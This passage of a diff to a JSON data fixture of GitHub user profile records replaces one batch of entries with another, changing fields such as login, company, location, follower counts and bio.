"name": "Owen McDonnell", + "login": "OwenMcDonnell", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/91682066?v=4", - "company": "@FigureTechnologies", - "location": "PA, USA", + "avatar_url": "https://avatars.githubusercontent.com/u/7119543?v=4", + "company": "@appveyor ", + "location": "vancouver", "collaborators_count": 0, - "following_count": 53, - "followers_count": 4, - "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2021-09-30T14:38:09Z", - "updated_at": "2024-09-04T00:11:09Z", - "node_id": "U_kgDOBXb1Eg", + "following_count": 1, + "followers_count": 17, + "public_gists_count": 10, + "public_repositories_count": 146, + "created_at": "2014-03-31T19:49:06Z", + "updated_at": "2024-08-01T03:02:35Z", + "node_id": "MDQ6VXNlcjcxMTk1NDM=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1406, + "pk": 6685, "fields": { - "nest_created_at": "2024-09-11T23:24:45.770Z", - "nest_updated_at": "2024-09-11T23:27:42.213Z", - "name": "", - "login": "wzd-hash", + "nest_created_at": "2024-09-22T07:47:39.058Z", + "nest_updated_at": "2024-09-22T18:50:12.813Z", + "name": "Paul van Brenk", + "login": "paulvanbrenk", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59039445?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5273975?v=4", "company": "", - "location": "", + "location": "Socially distanced at home", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-12-19T03:08:36Z", - "updated_at": "2024-09-03T06:32:15Z", - "node_id": "MDQ6VXNlcjU5MDM5NDQ1", - "bio": "", + "followers_count": 35, + "public_gists_count": 1, + "public_repositories_count": 43, + "created_at": "2013-08-20T23:33:12Z", + "updated_at": "2024-07-18T23:11:54Z", + "node_id": "MDQ6VXNlcjUyNzM5NzU=", + "bio": "Work on Data Tools", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1407, + "pk": 6686, "fields": { - "nest_created_at": "2024-09-11T23:24:46.998Z", - "nest_updated_at": "2024-09-11T23:24:46.998Z", - "name": "", - "login": "37IulianPopovici", + "nest_created_at": "2024-09-22T07:47:39.375Z", + "nest_updated_at": "2024-09-22T18:50:13.119Z", + "name": "Philipp Kursawe", + "login": "pke", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/136596702?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/164625?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2023-06-14T12:03:58Z", - "updated_at": "2024-08-20T10:13:00Z", - "node_id": "U_kgDOCCRM3g", + "following_count": 6, + "followers_count": 42, + "public_gists_count": 51, + "public_repositories_count": 111, + "created_at": "2009-12-08T20:07:26Z", + "updated_at": "2024-09-05T11:24:27Z", + "node_id": "MDQ6VXNlcjE2NDYyNQ==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1408, + "pk": 6687, "fields": { - "nest_created_at": "2024-09-11T23:24:52.002Z", - "nest_updated_at": "2024-09-11T23:24:52.002Z", - "name": "", - "login": "vishal-singh3", + "nest_created_at": "2024-09-22T07:47:39.688Z", + "nest_updated_at": "2024-09-22T18:50:13.442Z", + "name": "Proudust", + "login": "proudust", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/116781907?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20186429?v=4", "company": "", + "location": "Chibaraki, Japan", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 10, + "public_gists_count": 16, + "public_repositories_count": 109, + "created_at": "2016-06-28T11:55:32Z", + "updated_at": "2024-08-21T06:36:09Z", + "node_id": "MDQ6VXNlcjIwMTg2NDI5", + "bio": "Virtual cockadoodledoo", + "is_hireable": true, + "twitter_username": "proudust" + } +}, +{ + "model": "github.user", + "pk": 6688, + "fields": { + "nest_created_at": "2024-09-22T07:47:40.006Z", + "nest_updated_at": "2024-09-22T18:50:13.751Z", + "name": "Rhys Arkins", + "login": "rarkins", + "email": "rhys@arkins.net", + "avatar_url": "https://avatars.githubusercontent.com/u/6311784?v=4", + "company": "Mend", + "location": "Stockholm, Sweden", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 316, + "public_gists_count": 2, + "public_repositories_count": 196, + "created_at": "2014-01-03T14:40:53Z", + "updated_at": "2024-08-18T15:05:56Z", + "node_id": "MDQ6VXNlcjYzMTE3ODQ=", + "bio": "@renovate-bot creator, now Product Management @mend", + "is_hireable": false, + "twitter_username": "rarkins" + } +}, +{ + "model": "github.user", + "pk": 6689, + "fields": { + "nest_created_at": "2024-09-22T07:47:40.333Z", + "nest_updated_at": "2024-09-22T18:50:14.059Z", + "name": "Richard Knoll", + "login": "riknoll", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13754588?v=4", + "company": "Microsoft", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 58, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-10-27T04:27:08Z", - "updated_at": "2024-07-23T07:33:16Z", - "node_id": "U_kgDOBvXzUw", + "public_repositories_count": 95, + "created_at": "2015-08-11T20:23:19Z", + "updated_at": "2024-08-02T17:21:41Z", + "node_id": "MDQ6VXNlcjEzNzU0NTg4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395453,24 +653152,24 @@ }, { "model": "github.user", - "pk": 1409, + "pk": 6690, "fields": { - "nest_created_at": "2024-09-11T23:24:53.682Z", - "nest_updated_at": "2024-09-11T23:24:53.682Z", - "name": "Johan Blomgren", - "login": "blommish", + "nest_created_at": "2024-09-22T07:47:40.726Z", + "nest_updated_at": "2024-09-22T18:50:14.371Z", + "name": "Rolf Kristensen", + "login": "snakefoot", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/937168?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/11509660?v=4", "company": "", - "location": "Oslo, Norway", + "location": "Copenhagen", "collaborators_count": 0, - "following_count": 5, - "followers_count": 7, + "following_count": 3, + "followers_count": 52, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2011-07-25T12:26:35Z", - "updated_at": "2024-05-10T06:32:10Z", - "node_id": "MDQ6VXNlcjkzNzE2OA==", + "public_repositories_count": 114, + "created_at": "2015-03-16T20:38:55Z", + "updated_at": "2023-03-27T18:14:16Z", + "node_id": "MDQ6VXNlcjExNTA5NjYw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395478,124 +653177,124 @@ }, { "model": "github.user", - "pk": 1410, + "pk": 6691, "fields": { - "nest_created_at": "2024-09-11T23:24:55.009Z", - "nest_updated_at": "2024-09-11T23:24:55.009Z", - "name": "Philip Reiner Kensche", - "login": "vinjana", + "nest_created_at": "2024-09-22T07:47:41.073Z", + "nest_updated_at": "2024-09-22T18:50:14.684Z", + "name": "Ryan Cavanaugh", + "login": "RyanCavanaugh", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/275224?v=4", - "company": "German Cancer Research Center", - "location": "Heidelberg", + "avatar_url": "https://avatars.githubusercontent.com/u/6685088?v=4", + "company": "Microsoft", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 11, - "followers_count": 22, - "public_gists_count": 1, - "public_repositories_count": 13, - "created_at": "2010-05-13T07:59:58Z", - "updated_at": "2024-05-21T13:35:20Z", - "node_id": "MDQ6VXNlcjI3NTIyNA==", - "bio": "", - "is_hireable": true, - "twitter_username": "" + "following_count": 0, + "followers_count": 2176, + "public_gists_count": 13, + "public_repositories_count": 130, + "created_at": "2014-02-14T19:19:00Z", + "updated_at": "2024-08-27T16:45:52Z", + "node_id": "MDQ6VXNlcjY2ODUwODg=", + "bio": "Development lead for the TypeScript team at Microsoft.", + "is_hireable": false, + "twitter_username": "searyanc" } }, { "model": "github.user", - "pk": 1411, + "pk": 6692, "fields": { - "nest_created_at": "2024-09-11T23:24:57.553Z", - "nest_updated_at": "2024-09-11T23:24:57.553Z", - "name": "", - "login": "Andreas-Hujber", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/77403904?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:47:41.392Z", + "nest_updated_at": "2024-09-22T18:50:14.995Z", + "name": "Felipe Fernández", + "login": "felipefzdz", + "email": "felipe@gradle.com", + "avatar_url": "https://avatars.githubusercontent.com/u/369379?v=4", + "company": "@gradle ", + "location": "Gran Canaria", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 19, + "followers_count": 48, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-01-13T16:39:48Z", - "updated_at": "2024-09-09T11:17:03Z", - "node_id": "MDQ6VXNlcjc3NDAzOTA0", - "bio": "", + "public_repositories_count": 45, + "created_at": "2010-08-19T08:04:37Z", + "updated_at": "2024-05-20T07:06:43Z", + "node_id": "MDQ6VXNlcjM2OTM3OQ==", + "bio": "Senior Software Engineer at Gradle", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1412, + "pk": 6693, "fields": { - "nest_created_at": "2024-09-11T23:25:02.705Z", - "nest_updated_at": "2024-09-11T23:25:02.705Z", - "name": "Michaël Lefèvre", - "login": "lefevre00", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13120878?v=4", - "company": "Itk", - "location": "", + "nest_created_at": "2024-09-22T07:47:41.701Z", + "nest_updated_at": "2024-09-22T18:50:15.309Z", + "name": "Opportunity", + "login": "OpportunityLiu", + "email": "opportunity@live.in", + "avatar_url": "https://avatars.githubusercontent.com/u/13471233?v=4", + "company": "EIRI, Tsinghua", + "location": "Chengdu, China", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2015-06-30T15:19:36Z", - "updated_at": "2024-05-30T17:02:47Z", - "node_id": "MDQ6VXNlcjEzMTIwODc4", + "following_count": 27, + "followers_count": 182, + "public_gists_count": 4, + "public_repositories_count": 79, + "created_at": "2015-07-23T16:29:57Z", + "updated_at": "2024-08-10T07:54:39Z", + "node_id": "MDQ6VXNlcjEzNDcxMjMz", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1413, + "pk": 6694, "fields": { - "nest_created_at": "2024-09-11T23:25:03.923Z", - "nest_updated_at": "2024-09-11T23:25:03.923Z", - "name": "Thomas", - "login": "ThomGeG", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16097487?v=4", - "company": "", - "location": "Sydney, Australia", + "nest_created_at": "2024-09-22T07:47:42.007Z", + "nest_updated_at": "2024-09-22T18:50:15.639Z", + "name": "Alexander Mills", + "login": "ORESoftware", + "email": "alexander.d.mills@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11139560?v=4", + "company": "ORESoftware", + "location": "NYC / Remote", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2015-12-01T09:01:53Z", - "updated_at": "2024-04-30T06:36:12Z", - "node_id": "MDQ6VXNlcjE2MDk3NDg3", - "bio": "Just a nerd programming dumb stuff.", + "following_count": 281, + "followers_count": 107, + "public_gists_count": 180, + "public_repositories_count": 260, + "created_at": "2015-02-21T21:14:24Z", + "updated_at": "2024-09-16T03:05:15Z", + "node_id": "MDQ6VXNlcjExMTM5NTYw", + "bio": "Generalist / asynchronous.", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1414, + "pk": 6695, "fields": { - "nest_created_at": "2024-09-11T23:25:05.195Z", - "nest_updated_at": "2024-09-18T18:57:03.206Z", - "name": "blatobi", - "login": "blatobi", - "email": "tobias.blaschke@payfree.io", - "avatar_url": "https://avatars.githubusercontent.com/u/65171481?v=4", - "company": "", - "location": "Magdeburg, Germany", + "nest_created_at": "2024-09-22T07:47:42.647Z", + "nest_updated_at": "2024-09-22T18:50:16.266Z", + "name": "Moritz Röhrich", + "login": "m-ildefons", + "email": "moritz.rohrich@suse.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17141774?v=4", + "company": "@SUSE", + "location": "Berlin", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 5, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-05-11T12:52:41Z", - "updated_at": "2024-09-18T12:08:50Z", - "node_id": "MDQ6VXNlcjY1MTcxNDgx", + "public_repositories_count": 69, + "created_at": "2016-02-09T12:30:00Z", + "updated_at": "2024-08-14T07:00:32Z", + "node_id": "MDQ6VXNlcjE3MTQxNzc0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395603,99 +653302,124 @@ }, { "model": "github.user", - "pk": 1415, + "pk": 6696, "fields": { - "nest_created_at": "2024-09-11T23:25:06.408Z", - "nest_updated_at": "2024-09-18T18:57:04.264Z", - "name": "Gabriele", - "login": "aeroxr1", + "nest_created_at": "2024-09-22T07:47:42.976Z", + "nest_updated_at": "2024-09-22T18:50:16.575Z", + "name": "Mitchell Skaggs", + "login": "magneticflux-", + "email": "skaggsm333@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9124288?v=4", + "company": "@sendecomp", + "location": "Greater St. Louis Area, Missouri, USA, Earth, Sol system, Orion Arm, Milky Way, Laniakea Supercluster, The Universe", + "collaborators_count": 0, + "following_count": 47, + "followers_count": 43, + "public_gists_count": 11, + "public_repositories_count": 138, + "created_at": "2014-10-10T00:28:48Z", + "updated_at": "2024-04-08T17:11:02Z", + "node_id": "MDQ6VXNlcjkxMjQyODg=", + "bio": "Grad student at MS&T @sendecomp, writing Minecraft mods, worked on apps at @Pattonville-App-Development-Team and robots at @Pattonville-Robotics", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6697, + "fields": { + "nest_created_at": "2024-09-22T07:47:43.325Z", + "nest_updated_at": "2024-09-22T18:50:16.890Z", + "name": "Mike Eshva", + "login": "Eshva", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6518523?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1834350?v=4", "company": "", - "location": "", + "location": "Moscow, Russia", "collaborators_count": 0, - "following_count": 6, - "followers_count": 1, + "following_count": 1, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 22, - "created_at": "2014-01-27T21:03:44Z", - "updated_at": "2023-08-23T16:05:41Z", - "node_id": "MDQ6VXNlcjY1MTg1MjM=", - "bio": "", + "public_repositories_count": 23, + "created_at": "2012-06-09T21:19:40Z", + "updated_at": "2024-09-02T11:22:31Z", + "node_id": "MDQ6VXNlcjE4MzQzNTA=", + "bio": "I am a Russian software engineer with about 30 years of experience. I worked in Russia, Israel and the Netherlands.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1416, + "pk": 6698, "fields": { - "nest_created_at": "2024-09-11T23:25:09.783Z", - "nest_updated_at": "2024-09-11T23:25:17.378Z", - "name": "Guillaume Le Floch", - "login": "glefloch", + "nest_created_at": "2024-09-22T07:47:43.636Z", + "nest_updated_at": "2024-09-22T18:50:17.201Z", + "name": "Micah Lewis", + "login": "micahl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1827790?v=4", - "company": "Zenika", - "location": "Niort, France", + "avatar_url": "https://avatars.githubusercontent.com/u/1009123?v=4", + "company": "Ex-Microsoft", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 140, - "followers_count": 41, - "public_gists_count": 1, - "public_repositories_count": 62, - "created_at": "2012-06-07T17:23:11Z", - "updated_at": "2024-08-07T07:28:21Z", - "node_id": "MDQ6VXNlcjE4Mjc3OTA=", - "bio": "Tech Lead", - "is_hireable": true, - "twitter_username": "glfloch" + "following_count": 0, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 36, + "created_at": "2011-08-27T22:08:54Z", + "updated_at": "2024-09-03T11:22:26Z", + "node_id": "MDQ6VXNlcjEwMDkxMjM=", + "bio": "Ex-Msft Product Manager:\r\n* Azure IoT Edge / IoT Identity Service\r\n* WinUI, XAML, Universal Windows Platform", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1417, + "pk": 6699, "fields": { - "nest_created_at": "2024-09-11T23:25:29.798Z", - "nest_updated_at": "2024-09-12T01:23:36.757Z", - "name": "David J. M. Karlsen", - "login": "davidkarlsen", - "email": "david@davidkarlsen.com", - "avatar_url": "https://avatars.githubusercontent.com/u/18299?v=4", - "company": "davidkarlsen.com", - "location": "Bergen, Norway", + "nest_created_at": "2024-09-22T07:47:43.947Z", + "nest_updated_at": "2024-09-22T18:50:17.560Z", + "name": "Meir Gabay", + "login": "unfor19", + "email": "unfor19@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/15122452?v=4", + "company": "meirg", + "location": "Israel", "collaborators_count": 0, - "following_count": 47, - "followers_count": 165, - "public_gists_count": 8, - "public_repositories_count": 213, - "created_at": "2008-07-24T18:50:00Z", - "updated_at": "2024-08-28T11:20:09Z", - "node_id": "MDQ6VXNlcjE4Mjk5", - "bio": "Enterprise architecture, cloud-native, k8s, public-cloud, terraform.", + "following_count": 2, + "followers_count": 77, + "public_gists_count": 67, + "public_repositories_count": 100, + "created_at": "2015-10-14T09:57:49Z", + "updated_at": "2024-09-07T14:50:04Z", + "node_id": "MDQ6VXNlcjE1MTIyNDUy", + "bio": "\r\n DevOps Engineer @ LSports.eu\r\n", "is_hireable": true, - "twitter_username": "davidkarlsen" + "twitter_username": "meirg23" } }, { "model": "github.user", - "pk": 1418, + "pk": 6700, "fields": { - "nest_created_at": "2024-09-11T23:25:41.681Z", - "nest_updated_at": "2024-09-11T23:25:41.681Z", - "name": "Camille Drapier", - "login": "CamilleDrapier", - "email": "camille.drapier@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/13419648?v=4", - "company": "Allm", - "location": "Tokyo", + "nest_created_at": "2024-09-22T07:47:44.255Z", + "nest_updated_at": "2024-09-22T18:50:17.881Z", + "name": "Meir Blachman", + "login": "Meir017", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9786571?v=4", + "company": "@microsoft", + "location": "Israel", "collaborators_count": 0, - "following_count": 5, - "followers_count": 7, - "public_gists_count": 1, - "public_repositories_count": 25, - "created_at": "2015-07-20T14:49:28Z", - "updated_at": "2024-05-03T09:11:33Z", - "node_id": "MDQ6VXNlcjEzNDE5NjQ4", + "following_count": 17, + "followers_count": 55, + "public_gists_count": 25, + "public_repositories_count": 72, + "created_at": "2014-11-16T17:39:39Z", + "updated_at": "2024-09-01T13:36:24Z", + "node_id": "MDQ6VXNlcjk3ODY1NzE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395703,99 +653427,99 @@ }, { "model": "github.user", - "pk": 1419, + "pk": 6701, "fields": { - "nest_created_at": "2024-09-11T23:26:58.167Z", - "nest_updated_at": "2024-09-11T23:26:58.167Z", - "name": "Kevin O'Neal", - "login": "Scuilion", - "email": "oneal.kevin@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/241151?v=4", - "company": "", - "location": "Dallas, TX", + "nest_created_at": "2024-09-22T07:47:44.575Z", + "nest_updated_at": "2024-09-22T18:50:18.191Z", + "name": "Maxim Kolmakov", + "login": "MaXal", + "email": "maxim.kolmakov@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/266747?v=4", + "company": "JetBrains", + "location": "Augsburg", "collaborators_count": 0, - "following_count": 32, - "followers_count": 23, - "public_gists_count": 13, - "public_repositories_count": 60, - "created_at": "2010-04-10T18:33:50Z", - "updated_at": "2024-09-05T19:45:15Z", - "node_id": "MDQ6VXNlcjI0MTE1MQ==", - "bio": "", + "following_count": 2, + "followers_count": 14, + "public_gists_count": 2, + "public_repositories_count": 36, + "created_at": "2010-05-06T17:42:57Z", + "updated_at": "2024-08-26T12:40:09Z", + "node_id": "MDQ6VXNlcjI2Njc0Nw==", + "bio": "Tech Lead in IntelliJ Platform QA Automation", "is_hireable": false, - "twitter_username": "Scuilion" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1420, + "pk": 6702, "fields": { - "nest_created_at": "2024-09-11T23:26:59.008Z", - "nest_updated_at": "2024-09-11T23:26:59.008Z", - "name": "", - "login": "vielfarbig", + "nest_created_at": "2024-09-22T07:47:44.895Z", + "nest_updated_at": "2024-09-22T18:50:18.508Z", + "name": "Martin Björkström", + "login": "bjorkstromm", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/66375686?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7863439?v=4", "company": "", - "location": "", + "location": "Pietarsaari, Finland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2020-06-03T15:06:53Z", - "updated_at": "2024-07-02T16:27:16Z", - "node_id": "MDQ6VXNlcjY2Mzc1Njg2", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 2, + "followers_count": 115, + "public_gists_count": 22, + "public_repositories_count": 127, + "created_at": "2014-06-11T19:35:21Z", + "updated_at": "2024-09-17T10:48:40Z", + "node_id": "MDQ6VXNlcjc4NjM0Mzk=", + "bio": "Freelance Software Developer | OSS Contributor | All things .NET | Microsoft MVP | My hovercraft is full of eels", + "is_hireable": true, + "twitter_username": "bjorkstromm" } }, { "model": "github.user", - "pk": 1421, + "pk": 6703, "fields": { - "nest_created_at": "2024-09-11T23:26:59.829Z", - "nest_updated_at": "2024-09-11T23:26:59.830Z", - "name": "", - "login": "sify21", + "nest_created_at": "2024-09-22T07:47:45.211Z", + "nest_updated_at": "2024-09-22T18:50:18.815Z", + "name": "Gareth Johnson", + "login": "garethj2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11829223?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75035963?v=4", + "company": "J2 Innovations", "location": "", "collaborators_count": 0, - "following_count": 23, - "followers_count": 11, - "public_gists_count": 10, - "public_repositories_count": 67, - "created_at": "2015-04-07T04:46:08Z", - "updated_at": "2024-08-24T11:28:16Z", - "node_id": "MDQ6VXNlcjExODI5MjIz", - "bio": "vim enthusiast", + "following_count": 2, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-11-25T16:39:43Z", + "updated_at": "2024-08-27T15:50:10Z", + "node_id": "MDQ6VXNlcjc1MDM1OTYz", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1422, + "pk": 6704, "fields": { - "nest_created_at": "2024-09-11T23:27:00.686Z", - "nest_updated_at": "2024-09-13T05:17:54.160Z", - "name": "", - "login": "sdd4181", + "nest_created_at": "2024-09-22T07:47:45.556Z", + "nest_updated_at": "2024-09-22T18:50:19.135Z", + "name": "Jeremiah Small", + "login": "jeremiahsmall", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/69910407?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/814871?v=4", + "company": "Soliant Consulting", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-08-19T14:35:55Z", - "updated_at": "2024-08-03T02:03:35Z", - "node_id": "MDQ6VXNlcjY5OTEwNDA3", + "following_count": 9, + "followers_count": 14, + "public_gists_count": 2, + "public_repositories_count": 53, + "created_at": "2011-05-27T19:21:22Z", + "updated_at": "2024-08-08T06:17:43Z", + "node_id": "MDQ6VXNlcjgxNDg3MQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395803,99 +653527,99 @@ }, { "model": "github.user", - "pk": 1423, + "pk": 6705, "fields": { - "nest_created_at": "2024-09-11T23:27:05.985Z", - "nest_updated_at": "2024-09-12T01:23:31.279Z", - "name": "", - "login": "mathuriga", + "nest_created_at": "2024-09-22T07:47:45.880Z", + "nest_updated_at": "2024-09-22T18:50:19.449Z", + "name": "John Papa", + "login": "johnpapa", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11587426?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1202528?v=4", + "company": "JohnPapa.net, LLC", + "location": "Orlando, FL", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2015-03-21T16:22:50Z", - "updated_at": "2024-08-11T11:27:52Z", - "node_id": "MDQ6VXNlcjExNTg3NDI2", - "bio": "", + "following_count": 1, + "followers_count": 15314, + "public_gists_count": 58, + "public_repositories_count": 145, + "created_at": "2011-11-17T17:05:03Z", + "updated_at": "2024-07-23T19:13:44Z", + "node_id": "MDQ6VXNlcjEyMDI1Mjg=", + "bio": "Winter is Coming", "is_hireable": false, - "twitter_username": "" + "twitter_username": "john_papa" } }, { "model": "github.user", - "pk": 1424, + "pk": 6706, "fields": { - "nest_created_at": "2024-09-11T23:27:07.283Z", - "nest_updated_at": "2024-09-12T01:22:52.404Z", - "name": "Johan Karlberg", - "login": "wlfshmn", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1498204?v=4", - "company": "", - "location": "Gothenburg, Sweden", + "nest_created_at": "2024-09-22T07:47:46.190Z", + "nest_updated_at": "2024-09-22T18:50:19.844Z", + "name": "Brendan Quinn", + "login": "bquinn", + "email": "brendan at clueful.com.au", + "avatar_url": "https://avatars.githubusercontent.com/u/309976?v=4", + "company": "International Press Telecommunications Council (@iptc)", + "location": "Tallinn, Estonia and London, UK", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2012-03-04T01:03:39Z", - "updated_at": "2024-04-09T13:12:16Z", - "node_id": "MDQ6VXNlcjE0OTgyMDQ=", - "bio": "", + "following_count": 46, + "followers_count": 18, + "public_gists_count": 2, + "public_repositories_count": 25, + "created_at": "2010-06-20T13:27:31Z", + "updated_at": "2024-09-17T03:52:39Z", + "node_id": "MDQ6VXNlcjMwOTk3Ng==", + "bio": "Managing Director of IPTC. Ex-Fairfax, BBC, Associated Press, NewsFixed, Clueful Consulting and more.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1425, + "pk": 6707, "fields": { - "nest_created_at": "2024-09-11T23:27:08.221Z", - "nest_updated_at": "2024-09-11T23:27:08.221Z", - "name": "Larry Mota--Lavigne", - "login": "LarryMotaLavigne", - "email": "larry.motalavigne@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/9347622?v=4", - "company": "ATOM Studios", - "location": "Tours, France", + "nest_created_at": "2024-09-22T07:47:46.505Z", + "nest_updated_at": "2024-09-22T18:50:20.203Z", + "name": "Anca Antochi ", + "login": "ancaantochi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15937192?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 19, - "followers_count": 8, + "following_count": 0, + "followers_count": 11, "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2014-10-22T07:08:22Z", - "updated_at": "2024-08-21T11:24:55Z", - "node_id": "MDQ6VXNlcjkzNDc2MjI=", - "bio": "💻️ 🐈️ 🎸 🇫🇷 ✈️", + "public_repositories_count": 9, + "created_at": "2015-11-20T05:06:36Z", + "updated_at": "2024-06-21T17:35:07Z", + "node_id": "MDQ6VXNlcjE1OTM3MTky", + "bio": "", "is_hireable": false, - "twitter_username": "LarryMotaL" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1426, + "pk": 6708, "fields": { - "nest_created_at": "2024-09-11T23:27:10.001Z", - "nest_updated_at": "2024-09-11T23:27:10.001Z", - "name": "Wim Vandenhaute", - "login": "wvdhaute", + "nest_created_at": "2024-09-22T07:47:46.814Z", + "nest_updated_at": "2024-09-22T18:50:20.521Z", + "name": "tripu", + "login": "tripu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/765069?v=4", - "company": "", - "location": "Waregem, Belgium", + "avatar_url": "https://avatars.githubusercontent.com/u/1016538?v=4", + "company": "@DevoInc ", + "location": "Spain", "collaborators_count": 0, - "following_count": 11, - "followers_count": 6, - "public_gists_count": 3, - "public_repositories_count": 9, - "created_at": "2011-05-03T06:56:54Z", - "updated_at": "2024-08-27T07:03:39Z", - "node_id": "MDQ6VXNlcjc2NTA2OQ==", + "following_count": 371, + "followers_count": 168, + "public_gists_count": 44, + "public_repositories_count": 68, + "created_at": "2011-08-31T09:31:06Z", + "updated_at": "2024-09-18T11:22:29Z", + "node_id": "MDQ6VXNlcjEwMTY1Mzg=", "bio": "", "is_hireable": true, "twitter_username": "" @@ -395903,74 +653627,74 @@ }, { "model": "github.user", - "pk": 1427, + "pk": 6709, "fields": { - "nest_created_at": "2024-09-11T23:27:12.038Z", - "nest_updated_at": "2024-09-11T23:27:12.038Z", + "nest_created_at": "2024-09-22T07:47:47.132Z", + "nest_updated_at": "2024-09-22T18:50:20.829Z", "name": "", - "login": "emilgenchev", + "login": "per1234", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15820430?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8572152?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2015-11-12T16:53:40Z", - "updated_at": "2024-06-22T18:40:28Z", - "node_id": "MDQ6VXNlcjE1ODIwNDMw", - "bio": "", + "following_count": 643, + "followers_count": 465, + "public_gists_count": 3, + "public_repositories_count": 1431, + "created_at": "2014-08-27T19:19:23Z", + "updated_at": "2024-09-22T02:26:52Z", + "node_id": "MDQ6VXNlcjg1NzIxNTI=", + "bio": "Passionate about contributing to open 